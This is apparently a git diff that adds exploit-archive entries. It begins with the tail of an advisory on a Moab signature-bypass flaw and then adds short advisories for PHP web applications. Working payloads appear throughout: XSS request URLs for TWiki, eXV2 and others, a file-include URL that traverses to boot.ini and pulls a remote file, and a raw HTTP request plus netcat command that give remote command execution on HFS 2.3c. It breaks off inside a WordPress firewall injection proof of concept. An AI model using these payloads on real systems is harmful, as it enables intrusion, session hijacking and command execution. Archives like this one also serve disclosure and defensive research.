+Contained within this message is a element, which contains both a and elements. The is simply a SHA1 sum of the element. The , however, is computed based upon a key (.moab.key) which is read by a setuid root binary (mauth) which performs some additional verification of the user before providing a signature for the message. This use of signatures is intended to prevent users from being able to craft arbitrary messages as the signature value is validated by the Moab server. Messages containing an incorrect signature for the message will be rejected.
+
+However, whilst an incorrect SignatureValue results in a rejected message, it was found that if no signature is supplied then the signature checks are skipped and the remainder of the message processed. As a result it is possible to craft arbitrary messages and these messages will be accepted and honoured by the server as long as the message does not include a element.
+
+The following message contains no signature element and therefore will be accepted by the server:
+
+
+
+
+
+
+ test
+ test
+ test
+ /home/test
+ 2
+
+ /usr/bin/id
+ PBS
+ \START/usr/bin/id\0a\0a
+
+
+
+
+
+With no signing taking place an adversary can specify arbitrary users for these operations to be performed under, and thus impersonate other users including executing jobs as other users.
+
+
+##[Proof of Concept]
+
+In addition to job submission Moab also provides the ability to dynamically reconfigure the Moab server remotely. Whilst a default Moab installation will not permit the submission of root jobs it is possible to exploit this vulnerability in order to dynamically reconfigure Moab to allow root job submissions. The following request achieves this and due to its simple nature makes a useful proof of concept (the timestamp value may require altering):
+
+00000238
+
+
+Sending the entire message above (including the size value) will enable root jobs on a vulnerable server.
+
+
+##[Detailed Timeline]
+
+2014-07-08 : Vulnerability identified and detailed information passed to Adaptive
+2014-07-09 : Adaptive inform MWR that code changes are being made to address the issue
+2014-07-11 : Adaptive inform MWR that regression testing has identified an additional issue
+2014-07-14 : Moab 8 released
+2014-08-20 : Limited status update provided by Adaptive suggesting a 7.2 fix will emerge
+2014-09-08 : Release of advisory to HPC community
+2014-09-16 : Moab 7.2.9 released
+2014-09-25 : Public release of advisory
+
+
+http://labs.mwrinfosecurity.com
\ No newline at end of file
diff --git a/platforms/php/webapps/34840.txt b/platforms/php/webapps/34840.txt
new file mode 100755
index 000000000..4ec3fc840
--- /dev/null
+++ b/platforms/php/webapps/34840.txt
@@ -0,0 +1,70 @@
+source: http://www.securityfocus.com/bid/44066/info
+
+Ronny CMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Ronny CMS 1.1 r935 is vulnerable; other versions may also be affected.
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/platforms/php/webapps/34841.txt b/platforms/php/webapps/34841.txt
new file mode 100755
index 000000000..83c21d71f
--- /dev/null
+++ b/platforms/php/webapps/34841.txt
@@ -0,0 +1,73 @@
+source: http://www.securityfocus.com/bid/44069/info
+
+PluXml is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+PluXml 5.0.1 is vulnerable; prior versions may also be affected.
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/platforms/php/webapps/34842.txt b/platforms/php/webapps/34842.txt
new file mode 100755
index 000000000..1aa6ea699
--- /dev/null
+++ b/platforms/php/webapps/34842.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44103/info
+
+TWiki is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to TWiki 5.0.1 are vulnerable.
+
+GET /twiki/bin/view?rev=%27%3E%3Cscript%3Ealert%28Hello%29%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/34843.txt b/platforms/php/webapps/34843.txt
new file mode 100755
index 000000000..c71a3fb8a
--- /dev/null
+++ b/platforms/php/webapps/34843.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44103/info
+
+TWiki is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to TWiki 5.0.1 are vulnerable.
+
+GET /twiki/bin/login?origurl=&ANYTHING%27%3E%3Cscript%3Ealert%28Hello%29%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/34845.txt b/platforms/php/webapps/34845.txt
new file mode 100755
index 000000000..6f6161626
--- /dev/null
+++ b/platforms/php/webapps/34845.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44136/info
+
+PHP Photo Vote is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+PHP Photo Vote 1.3F is vulnerable; other versions may also be affected.
+
+http://www.example.com/demo/photovote/login.php?page=">
\ No newline at end of file
diff --git a/platforms/php/webapps/34847.txt b/platforms/php/webapps/34847.txt
new file mode 100755
index 000000000..3ef966a8b
--- /dev/null
+++ b/platforms/php/webapps/34847.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/44142/info
+
+PHP Easy Shopping Cart is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+PHP Easy Shopping Cart 3.1R is vulnerable; others versions may also be affected.
+
+http://example.com/subitems.php?id=[NB]&name=[XSS]
+
+http://example.com/demo/plant/subitems.php?id=16&name=">
diff --git a/platforms/php/webapps/34849.txt b/platforms/php/webapps/34849.txt
new file mode 100755
index 000000000..795d2410a
--- /dev/null
+++ b/platforms/php/webapps/34849.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/44165/info
+
+AdvertisementManager is prone to local and remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues may allow a remote attacker to obtain sensitive information or compromise the application and the underlying computer; other attacks are also possible.
+
+AdvertisementManager 3.1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka&savelogin=on&admin=Enter&req=../../../../../../../../boot.ini%00
+
+http://www.example.com/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka&savelogin=on&admin=Enter&req=http://www.example.com/c.txt?
\ No newline at end of file
diff --git a/platforms/php/webapps/34850.txt b/platforms/php/webapps/34850.txt
new file mode 100755
index 000000000..45d65496c
--- /dev/null
+++ b/platforms/php/webapps/34850.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/44169/info
+
+eXV2 CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+eXV2 CMS 2.10 is vulnerable; other versions may also be affected.
+
+http://www.example.com/manual/caferss/example.php?rssfeedURL="%20onmouseover=prompt(1)%20xss="&submit=OK
+http://www.example.com/modules/news/archive.php?subm=">
+http://www.example.com/modules/news/topics.php?subm=">
+http://www.example.com/modules/contact/index.php?op=contact&subm=">
\ No newline at end of file
diff --git a/platforms/php/webapps/34852.txt b/platforms/php/webapps/34852.txt
new file mode 100755
index 000000000..bcf5db43e
--- /dev/null
+++ b/platforms/php/webapps/34852.txt
@@ -0,0 +1,44 @@
+==========================================================
+HTTP File Server 2.3a - 2.3b - 2.3c Remote Command Execution
+
+# Author : Daniele Linguaglossa
+# Date: 30/09/2014
+# Remote: Yes
+# Vendor Homepage: http://rejetto.com/
+# Software Link: http://downloads.sourceforge.net/hfs/hfs2.3c.src.zip
+# CVE: CVE-2014-7226
+# Vendor Hompage: http://www.rejetto.com
+# Tested on: Windows 8
+# Version: 2.3a - 2.3b - 2.3c
+
+The latest HTTP File Server (2.3c and maybe prior too) was found to be
+vulnerable to a remote command execution in the file comment features ,
+because the application did not properly validate uft-8 broken byte
+representation, in fact during parsing program won't notice that there are
+multiple invalid representation and when they are printed into the page
+will get replaced with one of these characters " { . | } " causing a macro
+to be executed.
+==========================================================
+PoC
+==========================================================
+bug-utf8.txt
+==========================================================
+POST /upload/?mode=section&id=ajax.comment HTTP/1.1
+Connection: Close
+Content-Type:application/x-www-form-urlencoded
+
+text=%c1%bb%c0%aeexec%c1%bccmd%c0%ae%c1%bd&files=x
+==========================================================
+
+Copy the following on a file called bug-utf8.txt , then open hfs and add a
+folder called upload,
+it will ask if anyone should have upload permission click yes then with
+netcat do the following:
+
+nc localhost 8080 < bug-utf8.txt
+
+if everything was fine you should see a new command prompt being executed
+from hfs.
+
+==========================================================
+EOF
diff --git a/platforms/php/webapps/34854.txt b/platforms/php/webapps/34854.txt
new file mode 100755
index 000000000..c1538ac41
--- /dev/null
+++ b/platforms/php/webapps/34854.txt
@@ -0,0 +1,368 @@
+Document Title:
+===============
+All In One Wordpress Firewall 3.8.3 - Persistent Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1325
+
+
+Release Date:
+=============
+2014-09-29
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1327
+
+
+Common Vulnerability Scoring System:
+====================================
+3.3
+
+
+Product & Service Introduction:
+===============================
+WordPress itself is a very secure platform. However, it helps to add some extra security and firewall to your site by using a
+security plugin that enforces a lot of good security practices. The All In One WordPress Security plugin will take your website
+security to a whole new level. This plugin is designed and written by experts and is easy to use and understand. It reduces
+security risk by checking for vulnerabilities, and by implementing and enforcing the latest recommended WordPress security
+practices and techniques.
+
+(Copy of the Vendor Homepage: https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered two persistent vulnerabilities in the official All in One Security & Firewall v3.8.3 Wordpress Plugin.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-09-29: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Github
+Product: All In One Security & Firewall - Wordpress Plugin 3.8.3
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+Two POST inject web vulnerabilities has been discovered in the official All in One WP Security and Firewall v3.8.3 Plugin.
+The vulnerability allows remote attackers to inject own malicious script codes to the application-side of the vulnerable service.
+
+The first vulnerability is located in the 404 detection redirect url input field of the firewall detection 404 application module.
+Remote attackers are able to prepare malicious requests that inject own script codes to the application-side of the vulnerable service.
+The request method to inject is POST and the attack vector that exploits the issue location on the application-side (persistent).
+The attacker injects own script codes to the 404 detection redirect url input field and the execution occurs in the same section
+next to the input field context that gets displayed again.
+
+The second vulnerability is location in the file name error logs url input field of the FileSystem Components > Host System Logs module.
+Remote attackers are able to prepare malicious requests that inject own script codes to the applicaation-side of the vulnerable service.
+The request method to inject is POST and the attack vector that exploits the issue location on the application-side (persistent).
+The attacker injects own script codes to the file name error logs url input field and the execution occurs in the same section
+next to the input field context that gets displayed again.
+
+The security risk of the persistent POST inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2.
+Exploitation of the application-side web vulnerability requires no privileged web-application user account but low or medium user interaction.
+Successful exploitation of the vulnerability results in persistent phishing attacks, session hijacking, persistent external redirect to malicious
+sources and application-side manipulation of affected or connected module context.
+
+
+Request Method(s):
+ [+] POST
+
+Vulnerable Module(s):
+ [+] Firewall - Detection 404
+ [+] FileSystem Components > Host System
+Vulnerable Parameter(s):
+ [+] 404 detection redirect url
+ [+] file name error logs url
+
+Affected Module(s):
+ [+] Firewall - Detection 404
+ [+] FileSystem Components > Host System
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The first POST inject web vulnerability can be exploited by remote attackers without privileged application user account and with low or
+medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and
+steps below to continue.
+
+PoC: Exploit (Firewall > Detection 404 > [404 Lockout Redirect URL] )
+
+
+
404 Lockout Redirect URL:
+
<\"%20%20>\"<%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!]>" />
+ A blocked visitor will be automatically redirected to this URL.
+